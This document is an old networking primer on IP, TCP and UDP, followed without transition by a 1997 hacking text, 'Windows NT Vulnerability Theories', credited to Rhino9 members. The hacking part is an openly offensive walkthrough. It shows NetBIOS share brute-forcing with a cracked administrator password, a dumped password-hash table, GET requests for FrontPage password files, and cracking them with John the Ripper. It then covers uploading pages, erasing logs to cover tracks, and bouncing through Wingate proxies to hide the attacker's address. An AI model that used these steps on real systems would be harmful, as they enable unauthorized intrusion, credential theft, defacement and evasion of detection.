IP is the cornerstone of the TCP/IP suite. Every piece of data on
the Internet travels through IP packets, the basic unit of IP transmissions.
IP is termed a connectionless, unreliable protocol, since IP does not
exchange control information before transmitting data to a remote system,
the packets are merely sent to the destination with the expection that they
will be treated properly. IP is unreliable because it does not retransmit
lost packets or detect corrupted data. IP depends upon the upper level
protocols such as TCP or UDP to do this.

IP defines a universal addressing scheme called IP addresses. An IP
address is a 32-bit number, and each standard address is unique on the
Internet. Given an IP packet, the information can be routed to the
destination based upon the IP address defined in the packet header. IP
addresses are generally written as four numbers, between 0 and 255, separated
by a period (i.e. 168.143.27.120)

While the 32 bit number is an appropriate way to address systems for
computers, humans understandably have difficulty remembering them. Thus, the
Domain Name System (DNS) was developed to map IP addresses to their
corresponding domain names, and vice versa. Thus mulder.clark.net is the
same thing as 168.143.27.120, and 168.143.27.120 is the same thing as
mulder.clark.net .

It is very important to realize that these domain names are not used
or understood by IP at all. When an application wants to transmit data to
another machine, it must first translate the domain name to an IP address
using DNS. The receiving application must then use DNS to return a domain
name into its IP address. There is not a one to one correspondence between
IP addresses and domain names, a domain name can map to multiple IP addresses
and multiple IP addresses can map to the same domain name.

-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The TCP/IP Protcols: The Transmission Control Protocol (TCP)
-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Most Internet applications and services use the Transport Control
Protocol (TCP) to implement the transport layer. TCP provides a reliable,
connection-oriented, continuous-stream protocol. The implications of these
characteristics are:

o Reliable: When TCP segments, the smallest unit of a TCP transmission
are lost or interupted, the TCP implentation will detect this and
retransmit necessary segments.

o Connection-oriented: TCP sets up a connection with a remote system
by transmitting control information, often known as a handshake,
before beginning a communication. At the end of the connect, a
similar closing handshake it performed to end the transmission.

o Continous-stream: TCP provides a communications medium that allows
for an arbitrary number of bytes to be sent and received smoothly;
once a connection has been established, TCP segments provide the
application layer the appearance of a continous flow of data.


It is because of these characteristics, that it is easy to see why TCP
would be used by most Internet application and services. TCP makes it very
easy to create a network application, freeing you from worrying how the data
is broken up, or about coding correction routines. However, TCP requires a
significant amount of overhead, and retransmission of lost data may not be
required, because the information could have expired, thus making UDP the
popular choice for more simple applications and services.

Below is a chart, comparing TCP to both UDP and IP, showing strengths
and weaknesses.

ÚÄÄÄÄÄÂÄÄÄÄÄÂÄÄÄÄÄ¿
³ IP ³ UDP ³ TCP ³
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´
³ connection-oriented ³ no ³ no ³ yes ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´
³ message boundaries ³ yes ³ yes ³ no ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´
³ data checksum ³ no ³ opt ³ yes ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´
³ positive ack. ³ no ³ no ³ yes ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´
³ timeout and rexmit ³ no ³ no ³ yes ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´
³ duplicate detection ³ no ³ no ³ yes ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´
³ sequencing ³ no ³ no ³ yes ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´
³ flow control ³ no ³ no ³ yes ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÁÄÄÄÄÄÁÄÄÄÄÄÙ

An important addressing scheme which TCP defines is the port. Ports
are used to separate various TCP communications streams that are running
concurrently on the same system. For server applications, which wait for TCP
clients to initiate contact, a specific port can be established from where
communications will originate. These concepts all come together in a
programming abstraction known as sockets. TCP socket basics will be covered
later on.

The diagrams below show you how TCP makes a connection. TCP using
something called a three way handshake. Basically, the server is always
running, and waits for clients to starts the connection. The client passes a
SYN (synchronous) that is randomly generated. The sever replies with an ACK
(acknowledgment), which is the SYN the client generated plus 1. The server
also sends a SYN (randomly generated) back to the client. The client then
responds with and ACK, which is the server's SYN plus 1. The connection is
now established.

Client Server

Generate x -------- SYN(x) ---------> Receive SYN(x)
Generate y

Receive SYN(y) <--- ACK(x+1)/SYN(y) ---- Send ACK(x+1)
and ACK(x+1) and SYN(y)

Send ACK(y+1) -------- ACK(y+1) -------> Receive ACK(y+1)

Connection Established

-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The TCP/IP Protcols: The User Datagram Protocol (UDP)
-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

UDP is a low overhead alternative to TCP for host to host
communications. In contrast to TCP, UDP has the following characteristics:

o Unreliable: UDP has no mechanisms for detecting errors, nor
retransmitting lost or corrupted information.

o Connectionless: UDP does not negotiate a connection before
transmitting data. Information is sent with the assumption that
the recipient will be listening.

o Message-oriented: UDP allows applications to send self-contained
messages within UDP datagrams, the unit of UDP transmissions. The
application must package all information within individual
datagrams.

For some applications, UDP is a more fitting protocol than TCP. For
time protocols, lost data indicating the current time would be invalid and
outdated by the time that it was retransmitted. Another example is NFS, the
Network File System can operate more efficently and provide more reliablity
at the application layer, and thusly uses UDP.

As with TCP, UDP provides the addressing scheme of ports, allowing
for many applications to simultaneously send and receive datagrams. UDP ports
are distinct from TCP ports. For example, one application can respond to the
UDP port 512 while another unrelated service handles TCP port 512. To see
which ports use which protocol and service, look at a copy of /etc/services,
available with any UNIX box.



[Windows NT Vulnerability Theories Version 2...........................vacuum]

==========Windows NT Vulnerability Theories Version 2=============
by Vacuum & Chame|eon of Rhino9
[www.rhino9.org is coming]
[http://www.technotronic.com -- vacuum@technotronic.com]
December 04, 1997
Look for a NT Security Suite to be released by Rute soon based on the theories
mentioned in this text.


Special thanks to NeonSurge creator of rhino9, l0pht for l0phtcrack 1.5,
Jeremy Allison for pwdump, Andrew Tridgell for NAT and SAMBA, CyberToast,
Darkling, Rute, pSId for coding a linux version, and Microsoft for creating tools
that have nice holes in them.

All mentioned programs available at www.technotronic.com

This r9-nt-v2.zip includes:
vacuum.txt This text file.
vac1.cap Network Monitor packet sniffing sessions in
native format.This capture is a frontpage hack
session.
sniff.txt ASCII version which highlighs the which does not
require Network Monitor to be read as well as
Highlights the vac1.cap session.
service.pwd-scanner.c Scan for frontpage extsension serrvice.pwd file
for use on Linux based machines.
dnscan lists all servers in a particular domain and can
be used as an input file for service.pwd-scanner.
datapipe.c datapipe is similar to bounce.c
gcc -o datapipe datapipe.c
chmod 755 datapipe
./datapipe 2222 23 www.target.com
where 2222 is the source port
and 23 is the destination port for frontpage attack
this would be 80

If any programmers want to go HARDCORE with me, I have setup the appropriate
symbol files installed as well as the capability of running a "remote" debug
through the modem to share my ideas/theories.

==========NetBIOS Attack Program==================================

Verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server,
NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1

NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>

OPTIONS
-o Specify the output file. All results from the scan
will be written to the specified file, in addition
to standard output.
-u Specify the file to read usernames from. Usernames
will be read from the specified file when attempt-
ing to guess the password on the remote server.
Usernames should appear one per line in the speci-
fied file.
-p Specify the file to read passwords from. Passwords
will be read from the specified file when attempt-
ing to guess the password on the remote server.
Passwords should appear one per line in the speci-
fied file.
<address>
Addresses should be specified in comma deliminated
format, with no spaces. Valid address specifica-
tions include:
hostname - "hostname" is added
127.0.0.1-127.0.0.3, adds addresses 127.0.0.1
through 127.0.0.3
127.0.0.1-3, adds addresses 127.0.0.1 through
127.0.0.3
127.0.0.1-3,7,10-20, adds addresses 127.0.0.1
through 127.0.0.3, 127.0.0.7, 127.0.0.10 through
127.0.0.20.
hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1
through 127.0.0.1
All combinations of hostnames and address ranges as
specified above are valid.



Note that NAT.EXE will ip scan for netbios shares as performed above.

Comparing NAT.EXE to Microsoft's own executables:


C:\nbtstat -A 204.73.131.11

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
STUDENT1 <20> UNIQUE Registered
STUDENT1 <00> UNIQUE Registered
DOMAIN1 <00> GROUP Registered
DOMAIN1 <1C> GROUP Registered
DOMAIN1 <1B> UNIQUE Registered
STUDENT1 <03> UNIQUE Registered
DOMAIN1 <1E> GROUP Registered
DOMAIN1 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-C0-4F-C4-8C-9D

Here is a partial NetBIOS 16th bit listing:

Computername <00> UNIQUE workstation service name
<00> GROUP domain name
Server <20> UNIQUE Server Service name

Computername <03> UNIQUE Registered by the messenger service. This is the computername
to be added to the LMHOSTS file which is not necessary to use
NAT.EXE but is necessary if you would like to view the remote
computer in Network Neighborhood.
Username <03> Registered by the messenger service.
Domainname <1B> Registers the local computer as the master browser for the domain
Domainname <1C> Registers the computer as a domain controller for the domain
(PDC or BDC)
Domainname <1D> Registers the local client as the local segments master browser
for the domain
Domainname <1E> Registers as a Group NetBIOS Name
<BF> Network Monitor Name
<BE> Network Monitor Agent
<06> RAS Server
<1F> Net DDE
<21> RAS Client

C:\net view 204.73.131.11
Shared resources at 204.73.131.11



Share name Type Used as Comment

------------------------------------------------------------------------------
NETLOGON Disk Logon server share
Test Disk
The command completed successfully.

NOTE: The C$ ADMIN$ and IPC$ are hidden and are not shown.


C:\net use /?
The syntax of this command is:


NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]

NET USE [devicename | *] [password | *]] [/HOME]

NET USE [/PERSISTENT:{YES | NO}]


C:\net use x: \\204.73.131.11\test
The command completed successfully.




C:\unzipped\nat10bin>net use
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
OK X: \\204.73.131.11\test Microsoft Windows Network
OK \\204.73.131.11\test Microsoft Windows Network
The command completed successfully.

C:\nat -o vacuum.txt -u userlist.txt -p passlist.txt 204.73.131.10-204.73.131.30


[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt

[*]--- Checking host: 204.73.131.11
[*]--- Obtaining list of remote NetBIOS names

[*]--- Attempting to connect with name: *
[*]--- Unable to connect

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'

[*]--- Obtained server information:

Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]

[*]--- Obtained listing of shares:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
IPC$ IPC: Remote IPC
NETLOGON Disk: Logon server share
Test Disk:

[*]--- This machine has a browse list:

Server Comment
--------- -------
STUDENT1


[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$

[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$

[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON

[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test

[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access

If Default share of Everyone/Full Control. Done it is hacked.


==========Frontpage Extension Scanner & Cracker========================

C:\pwdump 204.73.131.11

NOTE: This is the pwdump from the webserver the Lan Manager password is set to "password".

Administrator:500:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C:Built-in account for administering the computer/domain::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:Built-in account for guest access to the computer/domain::
STUDENT7$:1000:E318576ED428A1DEF4B21403EFDE40D0:1394CDD8783E60378EFEE40503127253:::
ketan:1005:********************************:********************************:::
mari:1006:********************************:********************************:::
meng:1007:********************************:********************************:::
IUSR_STUDENT7:1014:582E6943331763A63BEC2B852B24C4D5:CBE9D641E74390AD9C1D0A962CE8C24B:Internet Guest Account,Internet Server Anonymous Access::

The #haccess.ctl file:

# -FrontPage-

Options None

<Limit GET POST PUT>
order deny,allow
deny from all
</Limit>
AuthName default_realm
AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd
AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp

Executing fpservwin.exe allows frontpage server extensions to be installed on

port 443 (HTTPS)Secure Sockets Layer
port 80 (HTTP)

NOTE: The Limit line. Telneting to port 80 or 443 and

  
using GET, POST, and PUT can be used
instead of Frontpage.

The following is a list of the Internet Information server files location
in relation to the local hard drive (C:) and the web (www.target.com)

C:\InetPub\wwwroot <Home>
C:\InetPub\scripts /Scripts
C:\InetPub\wwwroot\_vti_bin /_vti_bin
C:\InetPub\wwwroot\_vti_bin\_vti_adm /_vti_bin/_vti_adm
C:\InetPub\wwwroot\_vti_bin\_vti_aut /_vti_bin/_vti_aut
C:\InetPub\cgi-bin /cgi-bin
C:\InetPub\wwwroot\srchadm /srchadm
C:\WINNT\System32\inetserv\iisadmin /iisadmin
C:\InetPub\wwwroot\_vti_pvt
C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM Internet Information Index Server sample
C:\Program Files\Microsoft FrontPage\_vti_bin
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm


NOTE: If Index Information Server running under Internet Information Server.
service.pwd is our goal, although lots of servers are not password protected
and can be exploited easily. queryhit.htm if found can be used to get service.pwd
search for
"#filename=*.pwd"


FrontPage creates a directory _vti_pvt for the root web and for each FrontPage sub-web. For each FrontPage web with unique permissions, the _vti_pvt directory contains two files for the FrontPage web that the access file points to:

service.pwd contains the list of users and passwords for the FrontPage web.
service.grp contains the list of groups (one group for authors and one for administrators in FrontPage).
On Netscape servers, there are no service.grp files. The Netscape password files are:

administrators.pwd for administrators
authors.pwd for authors and administrators
users.pwd for users, authors, and administrators


NOTE: Name and password are case sensitive
Scanning PORT 80 or 443 options:

GET /_vti_inf.html #Ensures that frontpage server extensions
are installed.
GET /_vti_pvt/service.pwd #Contains the encrypted password files.
Not used on IIS and WebSite servers
GET /_vti_pvt/authors.pwd #On Netscape servers only. Encrypted
names and passwords of authors.
GET /_vti_pvt/administrators.pwd
GET /_vti_log/author.log #If author.log is there it will need to
be cleaned to cover your tracks

GET /samples/search/queryhit.htm # If service.pwd is obtained it will look
similar to this:

Vacuum:SGXJVl6OJ9zkE

The above password is apple
Turn it into DES format:

Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash

and save it as service.txt

The run your favorite unix password cracker like John The Ripper
C:\john -w:dictionary.txt service.txt

Usage: JOHN [flags] [-stdin|-w:wordfile] [passwd files]

Flags: -pwfile:<file>[,..] specify passwd file(s) (wildcards allowed)
-wordfile:<file> specify wordlist file
-restore[:<file>] restore session [from <file>]
-user:login|uid[,..] only crack this (these) user(s)
-timeout:<time> abort session after a period of <time> minutes
-incremental[:<mode>] incremental mode [using JOHN.INI entry <mode>]
-single single crack mode
-stdin read words from stdin
-list list each word
-test perform a benchmark
-beep beep when a password is found
-quiet do not beep when a password is found (default)
-noname don't use memory for login names

Other ways of obtaining service.pwd
http://ftpsearch.com/index.html
search for service.pwd
http://www.alstavista.digital.com
advanced search for link:"/_vti_pvt/service.pwd"

To open a FrontPage web

On the FrontPage Explorer’s File menu, choose Open FrontPage Web.
In the Getting Started dialog box, select Open an Existing FrontPage
Web and choose the FrontPage web you want to open.
Click More Webs if the web you want to open is not listed.
Click OK.
If you are prompted for your author name and password, you will have
to decrypt service.pwd, guess or move on.
Enter them in the Name and Password Required dialog box, and click OK.
Alter the existing page, or upload a page of your own.

I have captured the entire hack from connection, to password authentication,
to the actual page upload.

To view this file, you will need to use Windows NT's Network monitor
and open the file vac.cap


=====Wingate Scanner =======================================================

step 1.
Use WS_Ping Pro or Domscan to scan a ip address range looking for

xxx.xxx.xxx.xxx port 23 or port 1080

1080 is the socks port for wingate.
23 is of course the telnet port
step 2.
telnet to port 23 on found targets to see if you get a prompt like this
Wingate>

To Bounce on to another server
Wingate>www.target.com 23
or whatever port you want to connect to
(This would be a good way to mask your original ip address when setting up
bounce.c on a unix shell)



=====Sniffing ==============================================================

Running a packet sniffer to see the actual determining of shares:
NOTE: R_SRVSVC RPC Client call srvsvc:NetrShareEnum(..)
This frame is a NetShareEnum request, which requests a list of shared resources.

19 31.348 STUDENT7 *SMBSERVER R_SRVSVC RPC Client call srvsvc:NetrShareEnum(..) STUDENT7 *SMBSERVER IP
FRAME: Base frame properties
FRAME: Time of capture = Dec 3, 1997 9:12:54.18
FRAME: Time delta from previous physical frame: 0 milliseconds
FRAME: Frame number: 19
FRAME: Total frame length: 238 bytes
FRAME: Capture frame length: 238 bytes
FRAME: Frame data: Number of data bytes remaining = 238 (0x00EE)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 00C04FC48C9D
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : 00C04FC48C93
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 238 (0x00EE)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 224 (0x00E0)
IP: ID = 0x1A08; Proto = TCP; Len: 224
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Service Type = 0 (0x0)
IP: Precedence = Routine
IP: ...0.... = Normal Delay
IP: ....0... = Normal Throughput
IP: .....0.. = Normal Reliability
IP: Total Length = 224 (0xE0)
IP: Identification = 6664 (0x1A08)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 128 (0x80)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0x415E
IP: Source Address = 204.73.131.19
IP: Destination Address = 204.73.131.11
IP: Data: Number of data bytes remaining = 204 (0x00CC)
TCP: .AP..., len: 184, seq: 73409249-73409432, ack: 1505236, win: 8278, src: 1832 dst: 139 (NBT Session)
TCP: Source Port = 0x0728
TCP: Destination Port = NETBIOS Session Service
TCP: Sequence Number = 73409249 (0x46022E1)
TCP: Acknowledgement Number = 1505236 (0x16F7D4)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8278 (0x2056)
TCP: Checksum = 0x40ED
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 184 (0x00B8)
NBT: SS: Session Message, Len: 180
NBT: Packet Type = Session Message
NBT: Packet Flags = 0 (0x0)
NBT: .......0 = Add 0 to Length
NBT: Packet Length = 180 (0xB4)
NBT: SS Data: Number of data bytes remaining = 180 (0x00B4)
SMB: C transact TransactNmPipe, FID = 0x800
SMB: SMB Status = Error Success
SMB: Error class = No Error
SMB: Error code = No Error
SMB: Header: PID = 0x7CC0 TID = 0x0800 MID = 0x00C0 UID = 0x0800
SMB: Tree ID (TID) = 2048 (0x800)
SMB: Process ID (PID) = 31936 (0x7CC0)
SMB: User ID (UID) = 2048 (0x800)
SMB: Multiplex ID (MID) = 192 (0xC0)
SMB: Flags Summary = 24 (0x18)
SMB: .......0 = Lock & Read and Write & Unlock not supported
SMB: ......0. = Send No Ack not supported
SMB: ....1... = Using caseless pathnames
SMB: ...1.... = Canonicalized pathnames
SMB: ..0..... = No Opportunistic lock
SMB: .0...... = No Change Notify
SMB: 0....... = Client command
SMB: flags2 Summary = 32771 (0x8003)
SMB: ...............1 = Understands long filenames
SMB: ..............1. = Understands extended attributes
SMB: ...0............ = No DFS capabilities
SMB: ..0............. = No paging of IO
SMB: .0.............. = Using SMB status codes
SMB: 1............... = Using UNICODE strings
SMB: Command = R transact
SMB: Word count = 16
SMB: Word parameters
SMB: Total parm bytes = 0
SMB: Total data bytes = 96
SMB: Max parm bytes = 0
SMB: Max data bytes = 1024
SMB: Max setup words = 0 (0x0)
SMB: Transact Flags Summary = 0 (0x0)
SMB: ...............0 = Leave session intact
SMB: ..............0. = Response required
SMB: Transact timeout = 0 (0x0)
SMB: Parameter bytes = 0 (0x0)
SMB: Parameter offset = 84 (0x54)
SMB: Data bytes = 96 (0x60)
SMB: Data offset = 84 (0x54)
SMB: Max setup words = 2
SMB: Setup words
SMB: Pipe function = Transact named pipe (TransactNmPipe)
SMB: File ID (FID) = 2048 (0x800)
SMB: Byte count = 113
SMB: Byte parameters
SMB: File name = \PIPE\
SMB: Transaction data
SMB: Data: Number of data bytes remaining = 96 (0x0060)
MSRPC: c/o RPC Request: call 0x1 opnum 0xF context 0x0 hint 0x48
MSRPC: Version = 5 (0x5)
MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Request
MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC)
MSRPC: Packed Data Representation
MSRPC: Fragment Length = 96 (0x60)
MSRPC: Authentication Length = 0 (0x0)
MSRPC: Call Identifier = 1 (0x1)
MSRPC: Bind Frame Number = 17 (0x11)
MSRPC: Abstract Interface UUID = 4B324FC8-1670-01D3-1278-5A47BF6EE188
MSRPC: Allocation Hint = 72 (0x48)
MSRPC: Presentation Context Identifier = 0 (0x0)
MSRPC: Operation Number (c/o Request prop. dg header prop) = 15 (0xF)
MSRPC: Stub Data
R_SRVSVC: RPC Client call srvsvc:NetrShareEnum(..)
R_SRVSVC: SRVSVC_HANDLE ServerName = 204.73.131.11
R_SRVSVC: LPSHARE_ENUM_STRUCT InfoStruct {..}
R_SRVSVC: DWORD Level = 1 (0x1)
R_SRVSVC: _SHARE_ENUM_UNION ShareInfo {..}
R_SRVSVC: Switch Value = 1 (0x1)
R_SRVSVC: SHARE_INFO_1_CONTAINER *Level1 {..}
R_SRVSVC: DWORD EntriesRead = 0 (0x0)
R_SRVSVC: LPSHARE_INFO_1 Buffer = 0 (0x0)
R_SRVSVC: DWORD PreferedMaximumLength = 4294967295 (0xFFFFFFFF)
00000: 00 C0 4F C4 8C 9D 00 C0 4F C4 8C 93 08 00 45 00 ..O.....O.....E.
00010: 00 E0 1A 08 40 00 80 06 41 5E CC 49 83 13 CC 49 ....@...A^.I...I
00020: 83 0B 07 28 00 8B 04 60 22 E1 00 16 F7 D4 50 18 ...(...`".....P.
00030: 20 56 40 ED 00 00 00 00 00 B4 FF 53 4D 42 25 00 V@........SMB%.
00040: 00 00 00 18 03 80 24 82 00 00 00 00 00 00 00 00 ......$.........
00050: 00 00 00 08 C0 7C 00 08 C0 00 10 00 00 60 00 00 .....|.......`..
00060: 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 54 ...............T
00070: 00 60 00 54 00 02 00 26 00 00 08 71 00 00 5C 00 .`.T...&...q..\.
00080: 50 00 49 00 50 00 45 00 5C 00 00 00 00 2D 05 00 P.I.P.E.\....-..
00090: 00 03 10 00 00 00 60 00 00 00 01 00 00 00 48 00 ......`.......H.
000A0: 00 00 00 00 0F 00 36 1C 14 00 0E 00 00 00 00 00 ......6.........
000B0: 00 00 0E 00 00 00 32 00 30 00 34 00 2E 00 37 00 ......2.0.4...7.
000C0: 33 00 2E 00 31 00 33 00 31 00 2E 00 31 00 31 00 3...1.3.1...1.1.
000D0: 00 00 01 00 00 00 01 00 00 00 A0 FB 12 00 00 00 ................
000E0: 00 00 00 00 00 00 FF FF FF FF 00 00 00 00 ..............

This is the response to the above share request:

27 31.376 *SMBSERVER STUDENT7 R_SRVSVC RPC Server response srvsvc:NetrServerGetInfo(..) *SMBSERVER STUDENT7 IP
FRAME: Base frame properties
FRAME: Time of capture = Dec 3, 1997 9:12:54.46
FRAME: Time delta from previous physical frame: 7 milliseconds
FRAME: Frame number: 27
FRAME: Total frame length: 230 bytes
FRAME: Capture frame length: 230 bytes
FRAME: Frame data: Number of data bytes remaining = 230 (0x00E6)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 00C04FC48C93
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : 00C04FC48C9D
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 230 (0x00E6)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 216 (0x00D8)
IP: ID = 0x3C0E; Proto = TCP; Len: 216
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Service Type = 0 (0x0)
IP: Precedence = Routine
IP: ...0.... = Normal Delay
IP: ....0... = Normal Throughput
IP: .....0.. = Normal Reliability
IP: Total Length = 216 (0xD8)
IP: Identification = 15374 (0x3C0E)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 128 (0x80)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0x1F60
IP: Source Address = 204.73.131.11
IP: Destination Address = 204.73.131.19
IP: Data: Number of data bytes remaining = 196 (0x00C4)
TCP: .AP..., len: 176, seq: 1506074-1506249, ack: 73409903, win: 7314, src: 139 (NBT Session) dst: 1832
TCP: Source Port = NETBIOS Session Service
TCP: Destination Port = 0x0728
TCP: Sequence Number = 1506074 (0x16FB1A)
TCP: Acknowledgement Number = 73409903 (0x460256F)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 7314 (0x1C92)
TCP: Checksum = 0x7C1E
